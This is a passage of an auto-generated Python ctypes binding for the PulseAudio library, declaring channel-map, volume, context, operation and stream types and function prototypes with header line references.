PA_CHANNEL_POSITION_REAR_LEFT = 2
PA_CHANNEL_POSITION_REAR_RIGHT = 3
PA_CHANNEL_POSITION_LFE = 4
PA_CHANNEL_POSITION_SUBWOOFER = 0
PA_CHANNEL_POSITION_FRONT_LEFT_OF_CENTER = 1
PA_CHANNEL_POSITION_FRONT_RIGHT_OF_CENTER = 2
PA_CHANNEL_POSITION_SIDE_LEFT = 3
PA_CHANNEL_POSITION_SIDE_RIGHT = 4
PA_CHANNEL_POSITION_AUX0 = 5
PA_CHANNEL_POSITION_AUX1 = 6
PA_CHANNEL_POSITION_AUX2 = 7
PA_CHANNEL_POSITION_AUX3 = 8
PA_CHANNEL_POSITION_AUX4 = 9
PA_CHANNEL_POSITION_AUX5 = 10
PA_CHANNEL_POSITION_AUX6 = 11
PA_CHANNEL_POSITION_AUX7 = 12
PA_CHANNEL_POSITION_AUX8 = 13
PA_CHANNEL_POSITION_AUX9 = 14
PA_CHANNEL_POSITION_AUX10 = 15
PA_CHANNEL_POSITION_AUX11 = 16
PA_CHANNEL_POSITION_AUX12 = 17
PA_CHANNEL_POSITION_AUX13 = 18
PA_CHANNEL_POSITION_AUX14 = 19
PA_CHANNEL_POSITION_AUX15 = 20
PA_CHANNEL_POSITION_AUX16 = 21
PA_CHANNEL_POSITION_AUX17 = 22
PA_CHANNEL_POSITION_AUX18 = 23
PA_CHANNEL_POSITION_AUX19 = 24
PA_CHANNEL_POSITION_AUX20 = 25
PA_CHANNEL_POSITION_AUX21 = 26
PA_CHANNEL_POSITION_AUX22 = 27
PA_CHANNEL_POSITION_AUX23 = 28
PA_CHANNEL_POSITION_AUX24 = 29
PA_CHANNEL_POSITION_AUX25 = 30
PA_CHANNEL_POSITION_AUX26 = 31
PA_CHANNEL_POSITION_AUX27 = 32
PA_CHANNEL_POSITION_AUX28 = 33
PA_CHANNEL_POSITION_AUX29 = 34
PA_CHANNEL_POSITION_AUX30 = 35
PA_CHANNEL_POSITION_AUX31 = 36
PA_CHANNEL_POSITION_TOP_CENTER = 37
PA_CHANNEL_POSITION_TOP_FRONT_LEFT = 38
PA_CHANNEL_POSITION_TOP_FRONT_RIGHT = 39
PA_CHANNEL_POSITION_TOP_FRONT_CENTER = 40
PA_CHANNEL_POSITION_TOP_REAR_LEFT = 41
PA_CHANNEL_POSITION_TOP_REAR_RIGHT = 42
PA_CHANNEL_POSITION_TOP_REAR_CENTER = 43
PA_CHANNEL_POSITION_MAX = 44
pa_channel_position_t = enum_pa_channel_position # /usr/include/pulse/channelmap.h:147
pa_channel_position_mask_t = c_uint64 # /usr/include/pulse/channelmap.h:210
enum_pa_channel_map_def = c_int
PA_CHANNEL_MAP_AIFF = 0
PA_CHANNEL_MAP_ALSA = 1
PA_CHANNEL_MAP_AUX = 2
PA_CHANNEL_MAP_WAVEEX = 3
PA_CHANNEL_MAP_OSS = 4
PA_CHANNEL_MAP_DEF_MAX = 5
PA_CHANNEL_MAP_DEFAULT = 0
pa_channel_map_def_t = enum_pa_channel_map_def # /usr/include/pulse/channelmap.h:247
class struct_pa_channel_map(Structure):
__slots__ = [
'channels',
'map',
]
struct_pa_channel_map._fields_ = [
('channels', c_uint8),
('map', pa_channel_position_t * 32),
]
pa_channel_map = struct_pa_channel_map # /usr/include/pulse/channelmap.h:268
# /usr/include/pulse/channelmap.h:273
pa_channel_map_init = _lib.pa_channel_map_init
pa_channel_map_init.restype = POINTER(pa_channel_map)
pa_channel_map_init.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:276
pa_channel_map_init_mono = _lib.pa_channel_map_init_mono
pa_channel_map_init_mono.restype = POINTER(pa_channel_map)
pa_channel_map_init_mono.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:279
pa_channel_map_init_stereo = _lib.pa_channel_map_init_stereo
pa_channel_map_init_stereo.restype = POINTER(pa_channel_map)
pa_channel_map_init_stereo.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:285
pa_channel_map_init_auto = _lib.pa_channel_map_init_auto
pa_channel_map_init_auto.restype = POINTER(pa_channel_map)
pa_channel_map_init_auto.argtypes = [POINTER(pa_channel_map), c_uint, pa_channel_map_def_t]
# /usr/include/pulse/channelmap.h:291
pa_channel_map_init_extend = _lib.pa_channel_map_init_extend
pa_channel_map_init_extend.restype = POINTER(pa_channel_map)
pa_channel_map_init_extend.argtypes = [POINTER(pa_channel_map), c_uint, pa_channel_map_def_t]
# /usr/include/pulse/channelmap.h:294
pa_channel_position_to_string = _lib.pa_channel_position_to_string
pa_channel_position_to_string.restype = c_char_p
pa_channel_position_to_string.argtypes = [pa_channel_position_t]
# /usr/include/pulse/channelmap.h:297
pa_channel_position_from_string = _lib.pa_channel_position_from_string
pa_channel_position_from_string.restype = pa_channel_position_t
pa_channel_position_from_string.argtypes = [c_char_p]
# /usr/include/pulse/channelmap.h:300
pa_channel_position_to_pretty_string = _lib.pa_channel_position_to_pretty_string
pa_channel_position_to_pretty_string.restype = c_char_p
pa_channel_position_to_pretty_string.argtypes = [pa_channel_position_t]
PA_CHANNEL_MAP_SNPRINT_MAX = 336 # /usr/include/pulse/channelmap.h:307
# /usr/include/pulse/channelmap.h:310
pa_channel_map_snprint = _lib.pa_channel_map_snprint
pa_channel_map_snprint.restype = c_char_p
pa_channel_map_snprint.argtypes = [c_char_p, c_size_t, POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:316
pa_channel_map_parse = _lib.pa_channel_map_parse
pa_channel_map_parse.restype = POINTER(pa_channel_map)
pa_channel_map_parse.argtypes = [POINTER(pa_channel_map), c_char_p]
# /usr/include/pulse/channelmap.h:319
pa_channel_map_equal = _lib.pa_channel_map_equal
pa_channel_map_equal.restype = c_int
pa_channel_map_equal.argtypes = [POINTER(pa_channel_map), POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:322
pa_channel_map_valid = _lib.pa_channel_map_valid
pa_channel_map_valid.restype = c_int
pa_channel_map_valid.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:326
pa_channel_map_compatible = _lib.pa_channel_map_compatible
pa_channel_map_compatible.restype = c_int
pa_channel_map_compatible.argtypes = [POINTER(pa_channel_map), POINTER(pa_sample_spec)]
# /usr/include/pulse/channelmap.h:329
pa_channel_map_superset = _lib.pa_channel_map_superset
pa_channel_map_superset.restype = c_int
pa_channel_map_superset.argtypes = [POINTER(pa_channel_map), POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:334
pa_channel_map_can_balance = _lib.pa_channel_map_can_balance
pa_channel_map_can_balance.restype = c_int
pa_channel_map_can_balance.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:339
pa_channel_map_can_fade = _lib.pa_channel_map_can_fade
pa_channel_map_can_fade.restype = c_int
pa_channel_map_can_fade.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:345
pa_channel_map_to_name = _lib.pa_channel_map_to_name
pa_channel_map_to_name.restype = c_char_p
pa_channel_map_to_name.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:350
pa_channel_map_to_pretty_name = _lib.pa_channel_map_to_pretty_name
pa_channel_map_to_pretty_name.restype = c_char_p
pa_channel_map_to_pretty_name.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:354
pa_channel_map_has_position = _lib.pa_channel_map_has_position
pa_channel_map_has_position.restype = c_int
pa_channel_map_has_position.argtypes = [POINTER(pa_channel_map), pa_channel_position_t]
# /usr/include/pulse/channelmap.h:357
pa_channel_map_mask = _lib.pa_channel_map_mask
pa_channel_map_mask.restype = pa_channel_position_mask_t
pa_channel_map_mask.argtypes = [POINTER(pa_channel_map)]
class struct_pa_operation(Structure):
__slots__ = [
]
struct_pa_operation._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_operation(Structure):
__slots__ = [
]
struct_pa_operation._fields_ = [
('_opaque_struct', c_int)
]
pa_operation = struct_pa_operation # /usr/include/pulse/operation.h:33
pa_operation_notify_cb_t = CFUNCTYPE(None, POINTER(pa_operation), POINTER(None)) # /usr/include/pulse/operation.h:36
# /usr/include/pulse/operation.h:39
pa_operation_ref = _lib.pa_operation_ref
pa_operation_ref.restype = POINTER(pa_operation)
pa_operation_ref.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:42
pa_operation_unref = _lib.pa_operation_unref
pa_operation_unref.restype = None
pa_operation_unref.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:49
pa_operation_cancel = _lib.pa_operation_cancel
pa_operation_cancel.restype = None
pa_operation_cancel.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:52
pa_operation_get_state = _lib.pa_operation_get_state
pa_operation_get_state.restype = pa_operation_state_t
pa_operation_get_state.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:60
pa_operation_set_state_callback = _lib.pa_operation_set_state_callback
pa_operation_set_state_callback.restype = None
pa_operation_set_state_callback.argtypes = [POINTER(pa_operation), pa_operation_notify_cb_t, POINTER(None)]
class struct_pa_context(Structure):
__slots__ = [
]
struct_pa_context._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_context(Structure):
__slots__ = [
]
struct_pa_context._fields_ = [
('_opaque_struct', c_int)
]
pa_context = struct_pa_context # /usr/include/pulse/context.h:154
pa_context_notify_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(None)) # /usr/include/pulse/context.h:157
pa_context_success_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_int, POINTER(None)) # /usr/include/pulse/context.h:160
class struct_pa_proplist(Structure):
__slots__ = [
]
struct_pa_proplist._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_proplist(Structure):
__slots__ = [
]
struct_pa_proplist._fields_ = [
('_opaque_struct', c_int)
]
pa_proplist = struct_pa_proplist # /usr/include/pulse/proplist.h:272
pa_context_event_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_char_p, POINTER(pa_proplist), POINTER(None)) # /usr/include/pulse/context.h:167
# /usr/include/pulse/context.h:172
pa_context_new = _lib.pa_context_new
pa_context_new.restype = POINTER(pa_context)
pa_context_new.argtypes = [POINTER(pa_mainloop_api), c_char_p]
# /usr/include/pulse/context.h:177
pa_context_new_with_proplist = _lib.pa_context_new_with_proplist
pa_context_new_with_proplist.restype = POINTER(pa_context)
pa_context_new_with_proplist.argtypes = [POINTER(pa_mainloop_api), c_char_p, POINTER(pa_proplist)]
# /usr/include/pulse/context.h:180
pa_context_unref = _lib.pa_context_unref
pa_context_unref.restype = None
pa_context_unref.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:183
pa_context_ref = _lib.pa_context_ref
pa_context_ref.restype = POINTER(pa_context)
pa_context_ref.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:186
pa_context_set_state_callback = _lib.pa_context_set_state_callback
pa_context_set_state_callback.restype = None
pa_context_set_state_callback.argtypes = [POINTER(pa_context), pa_context_notify_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:190
pa_context_set_event_callback = _lib.pa_context_set_event_callback
pa_context_set_event_callback.restype = None
pa_context_set_event_callback.argtypes = [POINTER(pa_context), pa_context_event_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:193
pa_context_errno = _lib.pa_context_errno
pa_context_errno.restype = c_int
pa_context_errno.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:196
pa_context_is_pending = _lib.pa_context_is_pending
pa_context_is_pending.restype = c_int
pa_context_is_pending.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:199
pa_context_get_state = _lib.pa_context_get_state
pa_context_get_state.restype = pa_context_state_t
pa_context_get_state.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:209
pa_context_connect = _lib.pa_context_connect
pa_context_connect.restype = c_int
pa_context_connect.argtypes = [POINTER(pa_context), c_char_p, pa_context_flags_t, POINTER(pa_spawn_api)]
# /usr/include/pulse/context.h:212
pa_context_disconnect = _lib.pa_context_disconnect
pa_context_disconnect.restype = None
pa_context_disconnect.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:215
pa_context_drain = _lib.pa_context_drain
pa_context_drain.restype = POINTER(pa_operation)
pa_context_drain.argtypes = [POINTER(pa_context), pa_context_notify_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:220
pa_context_exit_daemon = _lib.pa_context_exit_daemon
pa_context_exit_daemon.restype = POINTER(pa_operation)
pa_context_exit_daemon.argtypes = [POINTER(pa_context), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:223
pa_context_set_default_sink = _lib.pa_context_set_default_sink
pa_context_set_default_sink.restype = POINTER(pa_operation)
pa_context_set_default_sink.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:226
pa_context_set_default_source = _lib.pa_context_set_default_source
pa_context_set_default_source.restype = POINTER(pa_operation)
pa_context_set_default_source.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:229
pa_context_is_local = _lib.pa_context_is_local
pa_context_is_local.restype = c_int
pa_context_is_local.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:232
pa_context_set_name = _lib.pa_context_set_name
pa_context_set_name.restype = POINTER(pa_operation)
pa_context_set_name.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:235
pa_context_get_server = _lib.pa_context_get_server
pa_context_get_server.restype = c_char_p
pa_context_get_server.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:238
pa_context_get_protocol_version = _lib.pa_context_get_protocol_version
pa_context_get_protocol_version.restype = c_uint32
pa_context_get_protocol_version.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:241
pa_context_get_server_protocol_version = _lib.pa_context_get_server_protocol_version
pa_context_get_server_protocol_version.restype = c_uint32
pa_context_get_server_protocol_version.argtypes = [POINTER(pa_context)]
enum_pa_update_mode = c_int
PA_UPDATE_SET = 0
PA_UPDATE_MERGE = 1
PA_UPDATE_REPLACE = 2
pa_update_mode_t = enum_pa_update_mode # /usr/include/pulse/proplist.h:337
# /usr/include/pulse/context.h:248
pa_context_proplist_update = _lib.pa_context_proplist_update
pa_context_proplist_update.restype = POINTER(pa_operation)
pa_context_proplist_update.argtypes = [POINTER(pa_context), pa_update_mode_t, POINTER(pa_proplist), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:251
pa_context_proplist_remove = _lib.pa_context_proplist_remove
pa_context_proplist_remove.restype = POINTER(pa_operation)
pa_context_proplist_remove.argtypes = [POINTER(pa_context), POINTER(c_char_p), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:256
pa_context_get_index = _lib.pa_context_get_index
pa_context_get_index.restype = c_uint32
pa_context_get_index.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:260
pa_context_rttime_new = _lib.pa_context_rttime_new
pa_context_rttime_new.restype = POINTER(pa_time_event)
pa_context_rttime_new.argtypes = [POINTER(pa_context), pa_usec_t, pa_time_event_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:264
pa_context_rttime_restart = _lib.pa_context_rttime_restart
pa_context_rttime_restart.restype = None
pa_context_rttime_restart.argtypes = [POINTER(pa_context), POINTER(pa_time_event), pa_usec_t]
# /usr/include/pulse/context.h:279
pa_context_get_tile_size = _lib.pa_context_get_tile_size
pa_context_get_tile_size.restype = c_size_t
pa_context_get_tile_size.argtypes = [POINTER(pa_context), POINTER(pa_sample_spec)]
# /usr/include/pulse/context.h:287
#pa_context_load_cookie_from_file = _lib.pa_context_load_cookie_from_file
#pa_context_load_cookie_from_file.restype = c_int
#pa_context_load_cookie_from_file.argtypes = [POINTER(pa_context), c_char_p]
pa_volume_t = c_uint32 # /usr/include/pulse/volume.h:120
class struct_pa_cvolume(Structure):
__slots__ = [
'channels',
'values',
]
struct_pa_cvolume._fields_ = [
('channels', c_uint8),
('values', pa_volume_t * 32),
]
pa_cvolume = struct_pa_cvolume # /usr/include/pulse/volume.h:151
# /usr/include/pulse/volume.h:154
pa_cvolume_equal = _lib.pa_cvolume_equal
pa_cvolume_equal.restype = c_int
pa_cvolume_equal.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:159
pa_cvolume_init = _lib.pa_cvolume_init
pa_cvolume_init.restype = POINTER(pa_cvolume)
pa_cvolume_init.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:168
pa_cvolume_set = _lib.pa_cvolume_set
pa_cvolume_set.restype = POINTER(pa_cvolume)
pa_cvolume_set.argtypes = [POINTER(pa_cvolume), c_uint, pa_volume_t]
PA_CVOLUME_SNPRINT_MAX = 320 # /usr/include/pulse/volume.h:175
# /usr/include/pulse/volume.h:178
pa_cvolume_snprint = _lib.pa_cvolume_snprint
pa_cvolume_snprint.restype = c_char_p
pa_cvolume_snprint.argtypes = [c_char_p, c_size_t, POINTER(pa_cvolume)]
PA_SW_CVOLUME_SNPRINT_DB_MAX = 448 # /usr/include/pulse/volume.h:185
# /usr/include/pulse/volume.h:188
pa_sw_cvolume_snprint_dB = _lib.pa_sw_cvolume_snprint_dB
pa_sw_cvolume_snprint_dB.restype = c_char_p
pa_sw_cvolume_snprint_dB.argtypes = [c_char_p, c_size_t, POINTER(pa_cvolume)]
PA_CVOLUME_SNPRINT_VERBOSE_MAX = 1984 # /usr/include/pulse/volume.h:194
# /usr/include/pulse/volume.h:200
#pa_cvolume_snprint_verbose = _lib.pa_cvolume_snprint_verbose
#pa_cvolume_snprint_verbose.restype = c_char_p
#pa_cvolume_snprint_verbose.argtypes = [c_char_p, c_size_t, POINTER(pa_cvolume), POINTER(pa_channel_map), c_int]
PA_VOLUME_SNPRINT_MAX = 10 # /usr/include/pulse/volume.h:207
# /usr/include/pulse/volume.h:210
pa_volume_snprint = _lib.pa_volume_snprint
pa_volume_snprint.restype = c_char_p
pa_volume_snprint.argtypes = [c_char_p, c_size_t, pa_volume_t]
PA_SW_VOLUME_SNPRINT_DB_MAX = 11 # /usr/include/pulse/volume.h:217
# /usr/include/pulse/volume.h:220
pa_sw_volume_snprint_dB = _lib.pa_sw_volume_snprint_dB
pa_sw_volume_snprint_dB.restype = c_char_p
pa_sw_volume_snprint_dB.argtypes = [c_char_p, c_size_t, pa_volume_t]
PA_VOLUME_SNPRINT_VERBOSE_MAX = 35 # /usr/include/pulse/volume.h:226
# /usr/include/pulse/volume.h:231
#pa_volume_snprint_verbose = _lib.pa_volume_snprint_verbose
#pa_volume_snprint_verbose.restype = c_char_p
#pa_volume_snprint_verbose.argtypes = [c_char_p, c_size_t, pa_volume_t, c_int]
# /usr/include/pulse/volume.h:234
pa_cvolume_avg = _lib.pa_cvolume_avg
pa_cvolume_avg.restype = pa_volume_t
pa_cvolume_avg.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:241
pa_cvolume_avg_mask = _lib.pa_cvolume_avg_mask
pa_cvolume_avg_mask.restype = pa_volume_t
pa_cvolume_avg_mask.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:244
pa_cvolume_max = _lib.pa_cvolume_max
pa_cvolume_max.restype = pa_volume_t
pa_cvolume_max.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:251
pa_cvolume_max_mask = _lib.pa_cvolume_max_mask
pa_cvolume_max_mask.restype = pa_volume_t
pa_cvolume_max_mask.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:254
pa_cvolume_min = _lib.pa_cvolume_min
pa_cvolume_min.restype = pa_volume_t
pa_cvolume_min.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:261
pa_cvolume_min_mask = _lib.pa_cvolume_min_mask
pa_cvolume_min_mask.restype = pa_volume_t
pa_cvolume_min_mask.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:264
pa_cvolume_valid = _lib.pa_cvolume_valid
pa_cvolume_valid.restype = c_int
pa_cvolume_valid.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:267
pa_cvolume_channels_equal_to = _lib.pa_cvolume_channels_equal_to
pa_cvolume_channels_equal_to.restype = c_int
pa_cvolume_channels_equal_to.argtypes = [POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:278
pa_sw_volume_multiply = _lib.pa_sw_volume_multiply
pa_sw_volume_multiply.restype = pa_volume_t
pa_sw_volume_multiply.argtypes = [pa_volume_t, pa_volume_t]
# /usr/include/pulse/volume.h:283
pa_sw_cvolume_multiply = _lib.pa_sw_cvolume_multiply
pa_sw_cvolume_multiply.restype = POINTER(pa_cvolume)
pa_sw_cvolume_multiply.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:289
pa_sw_cvolume_multiply_scalar = _lib.pa_sw_cvolume_multiply_scalar
pa_sw_cvolume_multiply_scalar.restype = POINTER(pa_cvolume)
pa_sw_cvolume_multiply_scalar.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:295
pa_sw_volume_divide = _lib.pa_sw_volume_divide
pa_sw_volume_divide.restype = pa_volume_t
pa_sw_volume_divide.argtypes = [pa_volume_t, pa_volume_t]
# /usr/include/pulse/volume.h:300
pa_sw_cvolume_divide = _lib.pa_sw_cvolume_divide
pa_sw_cvolume_divide.restype = POINTER(pa_cvolume)
pa_sw_cvolume_divide.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:306
pa_sw_cvolume_divide_scalar = _lib.pa_sw_cvolume_divide_scalar
pa_sw_cvolume_divide_scalar.restype = POINTER(pa_cvolume)
pa_sw_cvolume_divide_scalar.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:309
pa_sw_volume_from_dB = _lib.pa_sw_volume_from_dB
pa_sw_volume_from_dB.restype = pa_volume_t
pa_sw_volume_from_dB.argtypes = [c_double]
# /usr/include/pulse/volume.h:312
pa_sw_volume_to_dB = _lib.pa_sw_volume_to_dB
pa_sw_volume_to_dB.restype = c_double
pa_sw_volume_to_dB.argtypes = [pa_volume_t]
# /usr/include/pulse/volume.h:316
pa_sw_volume_from_linear = _lib.pa_sw_volume_from_linear
pa_sw_volume_from_linear.restype = pa_volume_t
pa_sw_volume_from_linear.argtypes = [c_double]
# /usr/include/pulse/volume.h:319
pa_sw_volume_to_linear = _lib.pa_sw_volume_to_linear
pa_sw_volume_to_linear.restype = c_double
pa_sw_volume_to_linear.argtypes = [pa_volume_t]
# /usr/include/pulse/volume.h:329
pa_cvolume_remap = _lib.pa_cvolume_remap
pa_cvolume_remap.restype = POINTER(pa_cvolume)
pa_cvolume_remap.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:333
pa_cvolume_compatible = _lib.pa_cvolume_compatible
pa_cvolume_compatible.restype = c_int
pa_cvolume_compatible.argtypes = [POINTER(pa_cvolume), POINTER(pa_sample_spec)]
# /usr/include/pulse/volume.h:337
pa_cvolume_compatible_with_channel_map = _lib.pa_cvolume_compatible_with_channel_map
pa_cvolume_compatible_with_channel_map.restype = c_int
pa_cvolume_compatible_with_channel_map.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:344
pa_cvolume_get_balance = _lib.pa_cvolume_get_balance
pa_cvolume_get_balance.restype = c_float
pa_cvolume_get_balance.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:355
pa_cvolume_set_balance = _lib.pa_cvolume_set_balance
pa_cvolume_set_balance.restype = POINTER(pa_cvolume)
pa_cvolume_set_balance.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), c_float]
# /usr/include/pulse/volume.h:362
pa_cvolume_get_fade = _lib.pa_cvolume_get_fade
pa_cvolume_get_fade.restype = c_float
pa_cvolume_get_fade.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:373
pa_cvolume_set_fade = _lib.pa_cvolume_set_fade
pa_cvolume_set_fade.restype = POINTER(pa_cvolume)
pa_cvolume_set_fade.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), c_float]
# /usr/include/pulse/volume.h:378
pa_cvolume_scale = _lib.pa_cvolume_scale
pa_cvolume_scale.restype = POINTER(pa_cvolume)
pa_cvolume_scale.argtypes = [POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:384
pa_cvolume_scale_mask = _lib.pa_cvolume_scale_mask
pa_cvolume_scale_mask.restype = POINTER(pa_cvolume)
pa_cvolume_scale_mask.argtypes = [POINTER(pa_cvolume), pa_volume_t, POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:391
pa_cvolume_set_position = _lib.pa_cvolume_set_position
pa_cvolume_set_position.restype = POINTER(pa_cvolume)
pa_cvolume_set_position.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_t, pa_volume_t]
# /usr/include/pulse/volume.h:397
pa_cvolume_get_position = _lib.pa_cvolume_get_position
pa_cvolume_get_position.restype = pa_volume_t
pa_cvolume_get_position.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_t]
# /usr/include/pulse/volume.h:402
pa_cvolume_merge = _lib.pa_cvolume_merge
pa_cvolume_merge.restype = POINTER(pa_cvolume)
pa_cvolume_merge.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:406
pa_cvolume_inc_clamp = _lib.pa_cvolume_inc_clamp
pa_cvolume_inc_clamp.restype = POINTER(pa_cvolume)
pa_cvolume_inc_clamp.argtypes = [POINTER(pa_cvolume), pa_volume_t, pa_volume_t]
# /usr/include/pulse/volume.h:410
pa_cvolume_inc = _lib.pa_cvolume_inc
pa_cvolume_inc.restype = POINTER(pa_cvolume)
pa_cvolume_inc.argtypes = [POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:414
pa_cvolume_dec = _lib.pa_cvolume_dec
pa_cvolume_dec.restype = POINTER(pa_cvolume)
pa_cvolume_dec.argtypes = [POINTER(pa_cvolume), pa_volume_t]
class struct_pa_stream(Structure):
__slots__ = [
]
struct_pa_stream._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_stream(Structure):
__slots__ = [
]
struct_pa_stream._fields_ = [
('_opaque_struct', c_int)
]
pa_stream = struct_pa_stream # /usr/include/pulse/stream.h:335
pa_stream_success_cb_t = CFUNCTYPE(None, POINTER(pa_stream), c_int, POINTER(None)) # /usr/include/pulse/stream.h:338
pa_stream_request_cb_t = CFUNCTYPE(None, POINTER(pa_stream), c_size_t, POINTER(None)) # /usr/include/pulse/stream.h:341
pa_stream_notify_cb_t = CFUNCTYPE(None, POINTER(pa_stream), POINTER(None)) # /usr/include/pulse/stream.h:344
pa_stream_event_cb_t = CFUNCTYPE(None, POINTER(pa_stream), c_char_p, POINTER(pa_proplist), POINTER(None)) # /usr/include/pulse/stream.h:352
# /usr/include/pulse/stream.h:357
pa_stream_new = _lib.pa_stream_new
pa_stream_new.restype = POINTER(pa_stream)
pa_stream_new.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_sample_spec), POINTER(pa_channel_map)]
# /usr/include/pulse/stream.h:366
pa_stream_new_with_proplist = _lib.pa_stream_new_with_proplist
pa_stream_new_with_proplist.restype = POINTER(pa_stream)
pa_stream_new_with_proplist.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_sample_spec), POINTER(pa_channel_map), POINTER(pa_proplist)]
class struct_pa_format_info(Structure):
__slots__ = [
'encoding',
'plist',
]
enum_pa_encoding = c_int
PA_ENCODING_ANY = 0
PA_ENCODING_PCM = 1
PA_ENCODING_AC3_IEC61937 = 2
PA_ENCODING_EAC3_IEC61937 = 3
PA_ENCODING_MPEG_IEC61937 = 4
PA_ENCODING_DTS_IEC61937 = 5
PA_ENCODING_MPEG2_AAC_IEC61937 = 6
PA_ENCODING_MAX = 7
PA_ENCODING_INVALID = -1
pa_encoding_t = enum_pa_encoding # /usr/include/pulse/format.h:64
struct_pa_format_info._fields_ = [
('encoding', pa_encoding_t),
('plist', POINTER(pa_proplist)),
]
pa_format_info = struct_pa_format_info # /usr/include/pulse/format.h:91
# /usr/include/pulse/stream.h:377
pa_stream_new_extended = _lib.pa_stream_new_extended
pa_stream_new_extended.restype = POINTER(pa_stream)
pa_stream_new_extended.argtypes = [POINTER(pa_context), c_char_p, POINTER(POINTER(pa_format_info)), c_uint, POINTER(pa_proplist)]
# /usr/include/pulse/stream.h:385
pa_stream_unref = _lib.pa_stream_unref
pa_stream_unref.restype = None
pa_stream_unref.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:388
pa_stream_ref = _lib.pa_stream_ref
pa_stream_ref.restype = POINTER(pa_stream)
pa_stream_ref.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:391
pa_stream_get_state = _lib.pa_stream_get_state
pa_stream_get_state.restype = pa_stream_state_t
pa_stream_get_state.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:394
pa_stream_get_context = _lib.pa_stream_get_context
